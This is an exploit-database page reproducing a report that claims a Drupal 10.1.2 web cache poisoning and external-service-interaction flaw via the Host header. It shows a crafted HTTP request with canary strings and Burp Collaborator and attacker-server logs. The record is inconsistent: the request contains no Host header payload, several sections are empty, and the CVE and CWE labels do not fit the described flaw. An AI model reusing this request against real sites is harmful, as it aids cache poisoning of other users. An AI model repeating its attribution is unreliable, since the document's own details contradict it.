Drupal 10.1.2 Web Cache Poisoning

CVE Category Price Severity
CVE-2021-33836 CWE-347 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-09-10
Our sensors found this exploit at:

Below is a copy:

Drupal 10.1.2 Web Cache Poisoning
## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
## Author: nu11secur1ty
## Date: 08/30/2023
## Vendor:
## Software:
## Reference:

## Description:
It is possible to induce the application to perform server-side HTTP
requests to arbitrary domains.
The payload was
submitted in the HTTP Host header.
The application performed an HTTP request to the specified domain. For
the second test, the attacker stored a response
on the server with malicious content. This can be bad for a lot of
users of this system if the attacker spreads a malicious URL
and sends it by email etc. By using a redirect exploit.

STATUS: HIGH-Vulnerability

GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
Accept-Encoding: gzip, deflate, psp4hw87ev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36 psp4hw87ev
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
[+]Response from Burpcollaborator server:
HTTP/1.1 200 OK
Server: Burp Collaborator
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62


[+]Response from Attacker server
```HTTP - - [30/Aug/2023 05:52:56] "GET
/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"

## Reproduce:

## Proof and Exploit:

## Time spend:

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.